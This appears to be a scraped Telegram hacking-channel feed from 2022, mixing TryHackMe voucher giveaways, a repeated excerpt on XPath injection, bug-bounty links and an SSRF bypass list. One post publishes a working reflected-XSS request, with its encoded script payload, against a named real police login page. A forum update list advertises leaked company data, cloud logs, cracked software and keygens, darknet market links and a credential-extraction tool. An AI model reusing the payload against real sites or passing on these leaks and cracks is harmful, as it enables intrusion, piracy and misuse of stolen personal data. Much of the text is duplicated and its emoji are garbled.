Forwarded from alex 14324
๐2
Forwarded from Bhartiya Hunters๐ฎ๐ณ (Founder & CEO โข)
Giving 1 Month TryHackMe Vouchers for only this group members & The Special Thing is :-
You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022
The Timing is fixed, Vouchers will be given at 2 PM Everyday
Enjoy Your Hacking & Give this group a special enthusiasm
Two Vouchers will be given tonight at 8PM
You Know Why We Are Giving this, Because Indians have a huge love, Humanity & Support for Everyone in this Universe, We are Celebrating India's 75th Independence (On 15th August 2022) Remembering our Freedom Fighters:- Bhagat Singh, Subash Chandra Bose, Sardar Vallabhbhai Patel, Bal Ganghadar Tilak & Many More martyrs that We Don't even Know, SALUTE TO ALL OF THEM๐ฎ๐ณ
Share this Group Guys, More and More
We are doing more than enough for you But We Should get atleast Some Attention & Active Members!
@Indianshunters Crew
You will get TryHackMe 1 Month Voucher * 1 Daily till 15 August 2022
The Timing is fixed, Vouchers will be given at 2 PM Everyday
Enjoy Your Hacking & Give this group a special enthusiasm
Share this Group Guys, More and More
We are doing more than enough for you But We Should get atleast Some Attention & Active Members!
@Indianshunters Crew
๐4๐1
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (PROT0C0L N1CK)
How to become SOC Analyst in 2022.pdf
317.9 KB
Practical XPath Injection Exploits
When auditing a web application it can be easy to overlook certain types of vulnerabilities if not systematically checking for each individually. Injection exploits are well known, and indeed they are listed as number one in the OWASP Top 10; however, in this article we will discuss an attack that is much less popular than SQL injection, XPath and XQuery injection.
When auditing a web application it can be easy to overlook certain types of vulnerabilities if not systematically checking for each individually. Injection exploits are well known, and indeed they are listed as number one in the OWASP Top 10; however, in this article we will discuss an attack that is much less popular than SQL injection, XPath and XQuery injection.
๐1
hat is XPATH and XQuery?
XPATH is a language that queries an XML document to locate a piece of information, find elements matching a certain pattern or containing an attribute. If the client has access to a piece of the XPath query being used, and this input is not being sanitized, the client will then have access to the entire XML document if they can determine its structure. This is because XPath differs from other database languages as there is no access controls or user authentication. XQuery is a super set of the XPath language that adds SQL-like syntax as well as some useful functions for querying the document.
XPATH is a language that queries an XML document to locate a piece of information, find elements matching a certain pattern or containing an attribute. If the client has access to a piece of the XPath query being used, and this input is not being sanitized, the client will then have access to the entire XML document if they can determine its structure. This is because XPath differs from other database languages as there is no access controls or user authentication. XQuery is a super set of the XPath language that adds SQL-like syntax as well as some useful functions for querying the document.
One-click account hijack for anyone using Apple sign-in with Reddit | Bug Bounty
https://youtu.be/gLt9GqRrC4I
https://youtu.be/gLt9GqRrC4I
๐1๐ฅ1
Forwarded from Bhartiya Hunters๐ฎ๐ณ (Founder & CEO โข)
Who Needs TryHackMe Premium Voucher?
[2Months] For Free
Only Needy Person, Who really wants to learn!
We Need Some Proofs:-
1. Your any CTF/Practising Lab Statistics!
2. Your Learning experience & Current Work!
3. Your Identity, Just a Video/Voice call to Identify that Whom We are giving the voucher!
Fill Out These Form!
https://forms.gle/tsw8pts7nJFuzrgo9
At @Indianshunters !
[2Months] For Free
Only Needy Person, Who really wants to learn!
We Need Some Proofs:-
1. Your any CTF/Practising Lab Statistics!
2. Your Learning experience & Current Work!
3. Your Identity, Just a Video/Voice call to Identify that Whom We are giving the voucher!
Fill Out These Form!
https://forms.gle/tsw8pts7nJFuzrgo9
At @Indianshunters !
๐1
https://avls.islamabadpolice.gov.pk/auth/login
Reflected Xss on Username Field
identity=AmNqkDMcy4pem%22%3e%3cscript%3ealert(1)%3c%2fscript%3eybyqa&password=k1B%21n7u%21L9&captcha=HoZfBT&submit=Login
But not very useful
Reflected Xss on Username Field
identity=AmNqkDMcy4pem%22%3e%3cscript%3ealert(1)%3c%2fscript%3eybyqa&password=k1B%21n7u%21L9&captcha=HoZfBT&submit=Login
But not very useful
๐6โค1
Forwarded from Bhartiya Hunters๐ฎ๐ณ (Founder & CEO โข)
Who Needs TryHackMe Premium Voucher?
[2Months] For Free
Only Needy Person, Who really wants to learn!
We Need Some Proofs:-
1. Your any CTF/Practising Lab Statistics!
2. Your Learning experience & Current Work!
3. Your Identity, Just a Video/Voice call to Identify that Whom We are giving the voucher!
Fill Out These Form!
https://forms.gle/tsw8pts7nJFuzrgo9
At @Indianshunters !
[2Months] For Free
Only Needy Person, Who really wants to learn!
We Need Some Proofs:-
1. Your any CTF/Practising Lab Statistics!
2. Your Learning experience & Current Work!
3. Your Identity, Just a Video/Voice call to Identify that Whom We are giving the voucher!
Fill Out These Form!
https://forms.gle/tsw8pts7nJFuzrgo9
At @Indianshunters !
โค2๐1
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (PROT0C0L N1CK)
LEARNING CYBER SECURITY/ ETHICAL HACKING YOUTUBE CHANNEL LIST:-
https://github.com/Nickyie/Cybersecurity-Resources/blob/main/Cybersecurity%20YouTube%20Channels/Cybersecurity%20YouTube%20Channels.md
Shared by @cybertrickszone1
https://github.com/Nickyie/Cybersecurity-Resources/blob/main/Cybersecurity%20YouTube%20Channels/Cybersecurity%20YouTube%20Channels.md
Shared by @cybertrickszone1
GitHub
Cybersecurity-Resources/Cybersecurity YouTube Channels/Cybersecurity YouTube Channels.md at main ยท Nickyie/Cybersecurity-Resources
A Library of various cybersecurity resources. Contribute to Nickyie/Cybersecurity-Resources development by creating an account on GitHub.
๐1
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (PROT0C0L N1CK)
Best SSRF Bypass List (2022)
-
Copy ALL headers and paste in your request.
-
List: https://t.co/deOSwhXTGp
-
-
#cybersecuritytips #CyberSecurity #CTF #bugbounty #bugbountytips https://t.co/RDGWw6Hnto
-
Copy ALL headers and paste in your request.
-
List: https://t.co/deOSwhXTGp
-
-
#cybersecuritytips #CyberSecurity #CTF #bugbounty #bugbountytips https://t.co/RDGWw6Hnto
Pastebin
SSRF Bypass List - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
โค2๐1
Updates On Hackbyte Forum:-
1.
5. Netsparker Enterprise / Acunetix360 Windows Keygen
6.
9. PCredz - This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface
10. Public penetration testing reports
11. ADDS_Tool - Active Directory Domain Services Tool.
12.
14. OLUXDATA.COM CLOUD LOGS
15.
17. articoolo.com leak
18. wiredbucks.com
19. Cerbero Suite Advanced v5.7.3 x64 cracked ZEN
20.
1.
aarfragrances.com leak
2. ApacheTomcatScanner: A python script to scan for Apache Tomcat server vulnerabilities3.
Tor2Door and Kingdom Market Darksite Links
4. Xray_Pro_1.9.1_Linux_x64-ZEN5. Netsparker Enterprise / Acunetix360 Windows Keygen
6.
JSubFinder - search webpages & javascript for hidden subdomains and secrets in the given URL
7. XSSER - Cross Site โScripterโ is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications
8. Logsensor- A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning9. PCredz - This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface
10. Public penetration testing reports
11. ADDS_Tool - Active Directory Domain Services Tool.
12.
SimpleX Chat โ the first messaging platform that has no user identifiers (not even random numbers) โ v3.1 of iOS and Android apps released โ with secret chat groups and server access via Tor.
13. Auditing Crypto Wallets14. OLUXDATA.COM CLOUD LOGS
15.
Novapay Leak
16. teespring.com leak17. articoolo.com leak
18. wiredbucks.com
19. Cerbero Suite Advanced v5.7.3 x64 cracked ZEN
20.
178K Norway Leaks
๐๐ป๐๐ปAll Updates On :- https://bit.ly/3yRyah3 ๐๐ป๐๐ป๐4โค1